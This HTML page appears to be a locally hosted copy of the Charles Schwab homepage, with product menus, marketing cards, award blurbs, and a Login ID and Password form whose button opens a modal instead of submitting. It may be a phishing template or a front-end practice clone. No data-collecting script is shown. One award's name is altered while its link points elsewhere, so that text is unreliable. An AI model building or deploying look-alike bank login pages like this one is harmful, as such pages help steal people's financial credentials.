<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Charles Schwab | A Modern Approach to Investing and Retirement Planning | Charles Schwab</title>
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.1/css/all.min.css" integrity="sha512-5Hs3dF2AEPkpNAR7UiOHba+lRSJNeM2ECkwxUIxC1Q/FLycGTbNapWXB4tP889k5T5Ju8fs4b1P5z/iB4nMfSQ==" crossorigin="anonymous" referrerpolicy="no-referrer" />

    <!-- Favicon -->
    <link rel="icon" type="image/png" href="assets/images/logo.svg" sizes="32x32">

</head>

<body>




    <!-- <a class="btn btn-primary" data-bs-toggle="offcanvas" href="#offcanvasExample" role="button" aria-controls="offcanvasExample">
        Link with href
    </a> -->


    <div class="offcanvas offcanvas-start" tabindex="-1" id="offcanvasExample" aria-labelledby="offcanvasExampleLabel">
        <div class="offcanvas-header">
            <h5 class="offcanvas-title" id="offcanvasExampleLabel">Offcanvas</h5>
            <button type="button" class="btn-close" data-bs-dismiss="offcanvas" aria-label="Close"></button>
        </div>
        <div class="offcanvas-body">
            <div class="mobile-menu-accordion" id="accordion-container"></div>
        </div>
    </div>

    <div class="d-flex">
        <div class="width-0 bg-black ease-in overflow-hidden" id="side-bar" style="height: 100vh">
            <div class="" id="accordion-container"></div>

        </div>
        <div class="w-100">
            <header>
                <div class="header-wrapper meganvpsr">
                    <!-- Wrapper Div -->
                    <div class="container d-flex justify-content-between align-items-center">

                        <div class="menu-icon">
                            <div class="open-menu" id="open-menu" style="cursor: pointer;">
                                <i class="fa-solid fa-bars fa-2xl" style="color: #ffffff;"></i>
                            </div>
                            <div class="close-menu" id="close-menu" style="display: none; cursor: pointer;">
                                <i class="fa-solid fa-xmark fa-2xl" style="color: #ffffff;"></i>
                            </div>
                        </div>


                        <!-- Logo Section -->
                        <div class="logo-container">
                            <!-- <a href="#" class="header-logo" onclick="openSideBar()"class="btn btn-primary" data-bs-toggle="offcanvas" href="#offcanvasExample" role="button" aria-controls="offcanvasExample">
                        <img src="assets/images/logo.svg" alt="Logo" width="95px" height="95px">
                    </a> -->
                            <a class="header-logo" data-bs-toggle="offcanvas" href="#offcanvasExample" role="button" aria-controls="offcanvasExample">
                                <img src="assets/images/logo.svg" alt="Logo" width="95px" height="95px">
                            </a>
                        </div>

                        <!-- Top and Navigation Header Section -->
                        <div class="header-content w-100 ms-4">
                            <!-- Top Header: Contact Info and Social Links -->
                            <div class=" top-header d-flex justify-content-end align-items-center mb-2">
                                <div class="header-social">
                                    <ul class="header-top-ul">
                                        <li>
                                            <a href=""><i class="fa-solid fa-location-dot"></i>Find a Branch</a>
                                        </li>
                                        <li>
                                            <a href=""><i class="fa-solid fa-phone"></i>Contact Us</a>
                                        </li>
                                        <li>
                                            <a href=""><i class="fa-solid fa-message"></i>Chat</a>
                                        </li>
                                        <li>
                                            <div class="d-flex align-items-center">
                                                <input class="form-control header-top-search me-2" type="search" placeholder="Search" aria-label="Search">
                                                <button class="search-btn"><i class="fa-solid fa-magnifying-glass text-white"></i></button>
                                            </div>
                                        </li>
                                        <li>
                                            <a href="">Log In<i class="fa-solid fa-angle-down ms-2"></i></a>
                                        </li>
                                    </ul>
                                </div>
                            </div>

                            <!-- Navigation Header -->
                            <nav class="navbar navbar-expand-lg p-0">
                                <div class="container-fluid">
                                    <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
                                        <span class="navbar-toggler-icon"></span>
                                    </button>
                                    <div class="collapse navbar-collapse" id="navbarNav">
                                        <ul class="navbar-nav me-auto mb-2 mb-lg-0">

                                            <li class="nav-item dropdown hover-dropdown">
                                                <a class="nav-link" href="javascript:void(0)" id="navbarDropdown" role="button" aria-expanded="false">
                                                    Products
                                                </a>
                                                <ul class="dropdown-menu custom-dropdown-menu" aria-labelledby="navbarDropdown">
                                                    <div class="row" style="width: 1150px;">
                                                        <!-- Column 1 -->
                                                        <div class="col-2">
                                                            <span>Products</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/brokerage">Brokerage and Trading</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/ira">Retirement Accounts (IRAS)</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/college-savings-accounts">Education and Custodial</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/pcra">Personal Choice Retirement</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/small-business-solutions">Small Business</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/investment-account-goals">Accounts by financial Goal</a>
                                                            <div class="account_btn account_btn-header">
                                                                <a href="https://www.schwab.com/open-an-account"><button class="btn">Join Us</button></a>
                                                            </div>
                                                        </div>
                                                        <!-- Column 2 -->
                                                        <div class="col-2">
                                                            <span>TRADING</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading">Schwab Trading Powered by Ameritrade™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading/thinkorswim">thinkorswim® Trading Platforms</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading/thinkorswim/compare-platforms">Platforms Overview</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading/learn-to-trade">Education</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading/support">Support</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/execution-quality">Order Execution</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/investment-research">Research</a>
                                                        </div>
                                                        <!-- Column 3 -->
                                                        <div class="col-2">
                                                            <span>Products</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/mutual-funds">Mutual Funds</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/etfs">ETFs</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/stocks">Stocks</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/options">Options</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/futures">Futures</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/fixed-income">Bonds, CDs & Fixed Income</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/money-market-funds">Money Market Funds</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/cash-investments">Cash Solutions & Rates </a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/annuities">Annuities</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/cryptocurrency">Cryptocurrency</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/investment">More Investment Products</a>
                                                        </div>
                                                        <!-- Column 4 -->
                                                        <div class="col-2">
                                                            <span>Borrowing</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/bank">Bank Offerings</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/checking">Checking</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/savings">Savings</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/mortgages">Home Loans & Rates</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/strategic-borrowing">Strategic Borrowing</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/credit-cards">Credit Cards</a>
                                                        </div>
                                                        <!-- Column 5 -->
                                                        <div class="col-2">
                                                            <span>Featured Offerings</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/thematic-investing">Schwab Investing Themes™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/investing-starter-kit">Schwab Starter Kit™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/fractional-shares-stock-slices">Schwab Stock Slices™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/direct-indexing">Schwab Personalized Indexing™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us/retirement-income">Generating Retirement Income</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us/tax-efficient-investing">Tax-Efficient Investing</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/personal-trust-services">Schwab Personal Trust Services</a>
                                                        </div>
                                                    </div>
                                                </ul>
                                            </li>

                                            <li class="nav-item dropdown hover-dropdown hover-dropdown2">
                                                <a class="nav-link" href="javascript:void(0)" id="navbarDropdown" role="button" aria-expanded="false">
                                                    Advice
                                                </a>
                                                <ul class="dropdown-menu custom-dropdown-menu custom-dropdown-menu2" aria-labelledby="navbarDropdown">
                                                    <div class="row" style="width: 500px;">
                                                        <!-- Column 1 -->
                                                        <div class="col-2">
                                                            <span>Advice Solutions</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/intelligent-portfolios">Automated Investing</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/intelligent-portfolios-premium">Automated Investing with Guidance</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/wealth-management/wealth-advisor">Schwab Wealth Advisory™</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us/wealth-management-services">More Advice Solutions</a>
                                                        </div>
                                                        <!-- Column 2 -->
                                                        <div class="col-2">
                                                            <span>Planning</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/financial-planning">Financial Planning Offering</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/how-much-do-i-need">How Much You Need to Retire</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/financial-planning/tools">Planning Calculators</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/financial-planning/schwab-plan">Complimentary Plan</a>
                                                        </div>
                                                    </div>
                                                </ul>
                                            </li>

                                            <li class="nav-item dropdown hover-dropdown hover-dropdown3">
                                                <a class="nav-link" href="javascript:void(0)" id="navbarDropdown" role="button" aria-expanded="false">
                                                    Pricing
                                                </a>
                                                <ul class="dropdown-menu custom-dropdown-menu custom-dropdown-menu3" aria-labelledby="navbarDropdown">
                                                    <div class="row" style="width: 700px;">
                                                        <!-- Column 1 -->
                                                        <div class="col-2">
                                                            <span>Pricing</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/pricing">Commissions and Fees</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/costs-of-investing">Understanding Investment Fees</a>
                                                        </div>
                                                        <!-- Column 2 -->
                                                        <div class="col-2">
                                                            <span>Accounts</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/transfer-to-schwab">Costs and Considerations</a>
                                                        </div>
                                                        <!-- Column 3 -->
                                                        <div class="col-2">
                                                            <span>OTHER DETAILS</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/transparency">Client Relationship Summaries</a>
                                                        </div>
                                                        <!-- Column 4 -->
                                                        <div class="col-2 price-last-col bg-light" style="margin: -20px -10px -20px 0;">
                                                            <a class="dropdown-item" href="https://www.schwab.com/pricing">
                                                                <div class="schwab-col-text">
                                                                    $0 online equity trade commissions + Satisfaction Guarantee.
                                                                </div>
                                                                <span class="schwab-col-link">See our pricing <i class="fa-solid fa-angle-right fa-2xs"></i></span>
                                                            </a>
                                                        </div>
                                                    </div>
                                                </ul>
                                            </li>

                                            <li class="nav-item dropdown hover-dropdown hover-dropdown4">
                                                <a class="nav-link" href="javascript:void(0)" id="navbarDropdown" role="button" aria-expanded="false">
                                                    Why Schwab
                                                </a>
                                                <ul class="dropdown-menu custom-dropdown-menu custom-dropdown-menu4" aria-labelledby="navbarDropdown">
                                                    <div class="row" style="width: 800px;">
                                                        <!-- Column 1 -->
                                                        <div class="col-2">
                                                            <span>The Schwab Difference</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/why-schwab">Why Choose Schwab</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/why-schwab/investing-education">Our Education</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/satisfaction-guarantee">Our Satisfaction Guarantee</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/schwabsafe">Our Schwab Security</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/schwab-experts">Our Experts</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/legal/account-protection">Our Account Protections</a>
                                                        </div>
                                                        <!-- Column 2 -->
                                                        <div class="col-2">
                                                            <span>Ways to Invest with Us</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us">Overview</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us/self-directed-investing">Self-Directed Investing</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/trading">Active Trading</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/intelligent-portfolios">Automated Investing</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us/wealth-management-services">Wealth and Investment Management Solutions</a>
                                                        </div>
                                                        <!-- Column 3 -->
                                                        <div class="col-2">
                                                            <span>How We Compare</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/compare-us">Compare Us to Our Competitors</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/awards">See Our #1 Rankings</a>
                                                        </div>
                                                        <!-- Column 4 -->
                                                        <div class="col-2 Schwab-last-col bg-light" style="margin: -20px -10px -20px 0;">

                                                            <a class="dropdown-item" href="https://www.schwab.com/invest-with-us">
                                                                <div class="schwab-col-text">
                                                                    More choices. More ways to invest how you want.
                                                                </div>
                                                                <span class="schwab-col-link">Explore ways to invest <i class="fa-solid fa-angle-right fa-2xs"></i></span>
                                                            </a>
                                                        </div>
                                                    </div>
                                                </ul>
                                            </li>

                                            <li class="nav-item dropdown hover-dropdown hover-dropdown5">
                                                <a class="nav-link" href="javascript:void(0)" id="navbarDropdown" role="button" aria-expanded="false">
                                                    Learn
                                                </a>
                                                <ul class="dropdown-menu custom-dropdown-menu custom-dropdown-menu5" aria-labelledby="navbarDropdown">
                                                    <div class="row" style="width: 1150px;">
                                                        <!-- Column 1 -->
                                                        <div class="col-2">
                                                            <span>Insights & Education</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn">Overview</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/stocks">Stocks</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/etfs">ETFs</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/mutual-funds">Mutual Funds</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/bonds">Bonds</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/fixed-income">Fixed Income</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/portfolio-management">Portfolio Management</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/options">Options</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/futures">Futures</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/forex">Forex</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/technical-analysis">Technical Analysis</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/fundamental-analysis">Fundamental Analysis</a>
                                                        </div>
                                                        <!-- Column 2 -->
                                                        <div class="col-2">
                                                            <span>Trading</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/trading">Overview</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/thinkorswim-demos">thinkorswim Demos</a>
                                                        </div>
                                                        <!-- Column 3 -->
                                                        <div class="col-2">
                                                            <span>Market Commentary</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/market-commentary">Overview</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/government-policy">Government Policy</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/international">International</a>
                                                        </div>
                                                        <!-- Column 4 -->
                                                        <div class="col-2">
                                                            <span>Planning & Retirement</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/financial-planning">Financial Planning</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/education">College & Education</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/topic/estate-planning">Estate Planning</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/saving-for-retirement">Saving for Retirement</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/in-retirement">Living in Retirement</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/taxes">Tax Planning</a>
                                                        </div>
                                                        <!-- Column 5 -->
                                                        <div class="col-2">
                                                            <span>Media</span>
                                                            <hr class="dropdown-divider">
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/onward">Onward Magazine</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/learn/podcasts">Podcasts</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/coaching">Schwab Coaching</a>
                                                            <a class="dropdown-item" href="https://www.schwab.com/schwab-network">Schwab Network</a>
                                                        </div>
                                                    </div>
                                                </ul>
                                            </li>
                                        </ul>
                                        <div class="account_btn account_btn-header">
                                            <a href="https://www.schwab.com/open-an-account"><button class="btn">Join Us</button></a>
                                        </div>
                                    </div>
                                </div>
                            </nav>
                        </div>
                    </div>
                </div>
            </header>

            <div class="container additional-container mt-2">
                <form class="row align-items-center justify-content-end">
                    <!-- Dropdown -->
                    <div class="col-auto px-0 me-2">
                        <select class="form-select additional-links-form-control" aria-label="Account Summary">
                            <option selected>Accounts Summary</option>
                            <option value="Account Balances">Account Balances</option>
                            <option value="Positions">Positions</option>
                            <option value="Trade Ticket">Trade Ticket</option>
                            <option value="History">History</option>
                            <option value="Stock & ETF Trading">Stock & ETF Trading</option>
                            <option value="Options Trading">Options Trading</option>
                            <option value="Mutual Fund Trading">Mutual Fund Trading</option>
                            <option value="Bond Trading">Bond Trading</option>
                            <option value="Research">Research</option>
                            <option value="Order Status">Order Status</option>
                            <option value="Watchlist">Watchlist</option>
                        </select>
                    </div>

                    <!-- Login ID -->
                    <div class="col-auto px-0 me-2">
                        <input type="text" class="form-control additional-links-form-control" placeholder="Login ID">
                    </div>

                    <!-- Password -->
                    <div class="col-auto position-relative px-0 me-2">
                        <input type="password" class="form-control additional-links-form-control" placeholder="Password">
                    </div>


                    <!-- Login Button -->
                    <div class="col-auto px-0 me-2">
                        <button type="button" class="btn login-btn addition-login-btn" data-bs-toggle="modal" data-bs-target="#staticBackdrop">Log In</button>
                    </div>
                </form>

                <!-- Additional Links -->
                <div class="row mt-2 additional-links">
                    <div class="col d-flex justify-content-end">
                        <div class="d-flex user-first">
                            <div class="pe-3">
                                <a href="javascript:void(0)" class="text-decoration-none">First Time Users</a> <span class="vr"></span>
                                <a href="javascript:void(0)" class="text-decoration-none">SchwabSafe</a>
                            </div>
                            <!-- Remember Login ID -->
                            <div>
                                <div class="form-check d-flex alighn-items-center pt-1 ">
                                    <input type="checkbox" class="form-check-input me-1" id="rememberLoginID">
                                    <label class="form-check-label" for="rememberLoginID">Remember Login ID</label>
                                </div>
                            </div>
                        </div>
                        <div class=" text-end">
                            <span>Forgot</span><a href="javascript:void(0)" class="text-decoration-none">Login ID</a> or
                            <a href="javascript:void(0)" class="text-decoration-none">Password?</a>
                        </div>
                    </div>
                </div>
            </div>

            <section class="insights-section">
                <div class="container">
                    <div class="row insights-row">
                        <div>
                            <a href="">
                                <span>Get the latest Market Insights</span>
                                <i class="fa-solid fa-angle-right fa-xs"></i>
                            </a>
                        </div>
                    </div>
                </div>
            </section>

            <div class="container mt-5">
                <div class="alert-box" id="alertBox">
                    <div class="row align-items-center mb-3">
                        <div class="col-md-10 col-10 d-flex align-items-center">
                            <i class="bi bi-info-circle-fill info-icon me-2"></i>
                            <i class="fa-solid fa-circle-exclamation fa-xl me-1" style="color: #0069C8;"></i>
                            <h6 class="mb-0">Location alert</h6>
                        </div>
                        <div class="col-md-2 col-2 text-end">
                            <button type="button" class="btn-close" aria-label="Close" id="closeBtn"></button>
                        </div>
                    </div>

                    <div class="row">
                        <div class="col-md-3 col-8">
                            <select class="form-select form-select-location form-select-sm" aria-label="Location options">
                                <option selected></option>
                                <option value="China">China</option>
                                <option value="Hong Kong">Hong Kong</option>
                                <option value="Singapore">Singapore</option>
                                <option value="United Kingdom">United Kingdom</option>
                                <option value="All other countries">All other countries</option>
                            </select>
                        </div>
                        <div class="col-md-2 col-2 ps-0">
                            <button type="button" class="btn Go-btn btn-sm">Go</button>
                        </div>
                    </div>
                </div>
            </div>

            <section class="banner-section">
                <div class="container-fluid banner mt-5">
                    <div class="row">
                        <div class="col-12 col-md-5 banner-heading-col">
                            <div class="container banner-container">
                                <div class="banner-heading mb-4">
                                    <h1 class="text-white">Looking to lighten your portfolio's tax load?</h1>
                                </div>
                                <div class="banner-btn">
                                    <div class="Schwab_btn mb-2">
                                        <a href="https://www.schwab.com/invest-with-us/tax-efficient-investing"><button class="btn">Find out how Schwab can help</button></a>
                                    </div>
                                    <div class="account_btn">
                                        <a href="https://www.schwab.com/open-an-account"><button class="btn">Join Us</button></a>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="col-12 col-md-7 banner-img-col p-0">
                            <div class="banner-img h-100">
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="help-section">
                <div class="container">
                    <div class="row mb-4">
                        <h2>
                            You deserve more. We can help.
                        </h2>
                    </div>
                    <div class="row">
                        <div class="col-md-4">
                            <div class="card help-card">
                                <div class="card-img text-center">
                                    <img src="assets/images/ICN-Pricing-2_0.png" alt="">
                                </div>
                                <div class="card-heading text-center">
                                    <h3>Transparent pricing and low costs.</h3>
                                </div>
                                <div class="card-body text-center">
                                    <a href="https://www.schwab.com/pricing">
                                        <span>See all our fees</span>
                                        <i class="fa-solid fa-angle-right fa-xs"></i>
                                    </a>
                                </div>


                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="card help-card">
                                <div class="card-img text-center">
                                    <img src="assets/images/ICN-Choose-3.png" alt="">
                                </div>
                                <div class="card-heading text-center">
                                    <h3>How you work with us is your choice.</h3>
                                </div>
                                <div class="card-body text-center">
                                    <a href="https://www.schwab.com/invest-with-us">
                                        <span>Choose what's right for you</span>
                                        <i class="fa-solid fa-angle-right fa-xs"></i>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="col-md-4">
                            <div class="card help-card-insurance border-0">
                                <div class="card-img text-center">
                                    <img src="assets/images/ICN-Insurance_4.png" alt="">
                                </div>
                                <div class="card-heading text-center">
                                    <h3>Your satisfaction is guaranteed and your security is our priority.</h3>
                                </div>
                                <div class="card-body card-body-help text-center">
                                    <div>
                                        <a href="https://www.schwab.com/satisfaction-guarantee">
                                            <span>Satisfaction Guarantee</span>
                                            <i class="fa-solid fa-angle-right fa-xs"></i>
                                        </a>
                                    </div>
                                    <div>
                                        <a href="https://www.schwab.com/schwabsafe/security-guarantee">
                                            <span>Security Guarantee</span>
                                            <i class="fa-solid fa-angle-right fa-xs"></i>
                                        </a>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="work-together-section">
                <div class="container">
                    <div class="row">
                        <h2>How we work together is up to you.</h2>
                    </div>
                    <div class="row work-together-row-content">
                        <div class="col-12 col-xl-3 col-md-4 p-2 work-together-col">
                            <div class="card work-together-card">
                                <div class="card-img">
                                    <img src="assets/images/Getty_1335958440_72dpi_v3_2.avif" class="img-fluid" alt="">
                                </div>
                                <div class="card-heading">
                                    <h2>Manage your own portfolios with ease.</h2>
                                </div>
                                <div class="card-body p-0">
                                    <p>Access a full range of tools, resources, and expertise to invest the way you want.</p>
                                </div>
                                <div class="card-btn">
                                    <a href="https://www.schwab.com/invest-with-us/self-directed-investing">
                                        <button class="btn btn-primary">Learn more about self-directed portfolio management</button>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="col-12 col-xl-3 col-md-4 p-2 work-together-col">
                            <div class="card work-together-card">
                                <div class="card-img">
                                    <img src="assets/images/Getty_1323758548_v2_1_2.avif" class="img-fluid" alt="">
                                </div>
                                <div class="card-heading">
                                    <h2>Supercharge your trading experience.</h2>
                                </div>
                                <div class="card-body p-0">
                                    <p>Get the best in trading—award-winning platforms, tailored education, and specialized support.</p>
                                </div>
                                <div class="card-btn card-btn2">
                                    <a href="https://www.schwab.com/trading">
                                        <button class="btn btn-primary">Learn more about active trading</button>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="col-12 col-xl-3 col-md-4 p-2 work-together-col">
                            <div class="card work-together-card">
                                <div class="card-img">
                                    <img src="assets/images/AutomatedInvesting-IMG_0_1.avif" class="img-fluid" alt="">
                                </div>
                                <div class="card-heading">
                                    <h2>Get a jumpstart with automated wealth building.</h2>
                                </div>
                                <div class="card-body p-0">
                                    <p>Schwab Intelligent Portfolios® builds, monitors, and automatically rebalances a portfolio based on your goals.</p>
                                </div>
                                <div class="card-btn card-btn3">
                                    <a href="https://www.schwab.com/intelligent-portfolios">
                                        <button class="btn btn-primary">Learn more about automated investing</button>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <div class="col-12 col-xl-3 col-md-4 p-2 work-together-col">
                            <div class="card work-together-card">
                                <div class="card-img">
                                    <img src="assets/images/WealthManagement-IMG_0_1_0.avif" class="img-fluid" alt="">
                                </div>
                                <div class="card-heading">
                                    <h2>Choose professional wealth management.</h2>
                                </div>
                                <div class="card-body p-0">
                                    <p>Pursue your goals confidently with the help of Schwab's comprehensive wealth and investment management solutions.</p>
                                </div>
                                <div class="card-btn card-btn4">
                                    <a href="https://www.schwab.com/invest-with-us/wealth-management-services">
                                        <button class="btn btn-primary">Learn more about wealth solutions</button>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="next-step-section">
                <div class="container">
                    <div class="row next-step-row py-2">
                        <div class="d-flex justify-content-center align-items-center flex-wrap">
                            <div class="next-step-content">
                                <h2>Take the next step.</h2>
                            </div>
                            <div class="next-step-btn account_btn">
                                <a href="https://www.schwab.com/open-an-account">
                                    <button class="btn">Join Us</button>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </section>

            <section class="clients-section">
                <div class="container">
                    <div class="row clients-row-heading">
                        <h2 class="p-xl-0">Putting clients first gets noticed.</h2>
                    </div>
                </div>
                <div class="container-fluid clients-card-container">
                    <div class="container py-3">
                        <div class="row">
                            <div class="col-lg-4 col-md-6">
                                <div class="card clients-card border-0">
                                    <div class="card-img">
                                        <img src="assets/images/Forbes-1068x60087_transparent.avif" class="img-fluid" alt="...">
                                    </div>
                                    <div class="clients-card-heading">
                                        <h2 class="clients-card-title">Forbes Best Customer Service 2024</h2>
                                    </div>
                                    <div class="clients-card-body">
                                        <p class="card-text">Forbes Best Customer Service 2024 was given on November 16, 2023, and expires on January 2, 2025. The criteria, evaluation, and ranking were determined by Forbes partnered with HundredX. <a href="https://www.forbes.com/sites/rachelpeachman/2023/11/09/best-brands-for-customer-service-2024-methodology/?sh=77b472f8700d"> See here</a> for more information. Schwab paid a licensing fee to Forbes for use of the award and logos.</p>
                                    </div>
                                </div>
                            </div>
                            <div class="col-lg-4 col-md-6">
                                <div class="card clients-card border-0">
                                    <div class="card-img">
                                        <img src="assets/images/IBD-1068x600_transparent.avif" class="img-fluid" alt="...">
                                    </div>
                                    <div class="clients-card-heading">
                                        <h2 class="clients-card-title">Entrepreneur's Business Daily: Best Online Brokers 2024</h2>
                                    </div>
                                    <div class="clients-card-body">
                                        <p class="card-text">12 Year Winner: Rated a Best Online Broker
                                            Third-party accolade award was given on January 25, 2024, and is for a 15-month timeframe. The criteria, evaluation, and ranking were determined by <a href="https://www.investors.com/best-online-brokers-2024/">Entrepreneur's Business Daily</a> in conjunction with its research partner, TechnoMetrica Market Intelligence. Schwab paid a licensing fee to York Graphic Services, LLC for use of the award and logos.</p>
                                    </div>
                                </div>
                            </div>
                            <div class="col-lg-4 col-md-6">
                                <div class="card clients-card border-0">
                                    <div class="card-img">
                                        <img src="assets/images/2024 J.D. Power Award_1068x600 (2).avif" class="img-fluid" alt="...">
                                    </div>
                                    <div class="clients-card-heading">
                                        <h2 class="clients-card-title">Ameritrade, now part of Charles Schwab</h2>
                                    </div>
                                    <div class="clients-card-body">
                                        <p><strong>#1 for Satisfaction among do-it-yourself investors</strong></p>
                                        <p class="card-text">TD Ameritrade, Inc. ("Ameritrade") Member SIPC, a subsidiary of The Charles Schwab Corporation ("Charles Schwab"), received the highest score in the do-it-yourself segment of the J.D. Power 2024 U.S. Self-Directed Investor Satisfaction Study of investors' satisfaction with self-directed investment firms. It is independently conducted, and the participating firms do not pay to participate. Use of study results in promotional materials is subject to a license fee. Visit <a href="https://www.jdpower.com/business/awards">jdpower.com/awards</a> for more details.</p>
                                    </div>
                                </div>
                            </div>

                        </div>
                    </div>
                </div>

            </section>

            <section class="information-section">
                <div class="container information-container">
                    <div class="row">
                        <h2 class="information-heading">Important information about our relationship with you: Client Relationship Summaries</h2>
                        <p class="information-text">Our Client Relationship Summaries offer a brief summary of our services, fees, and obligations when we work with you in a broker-dealer or an investment advisory relationship. <a href="https://www.schwab.com/transparency"><span>Learn more at schwab.com/transparency </span><i class="fa-solid fa-angle-right fa-xs mt-2"></i></a></p>
                    </div>
                </div>
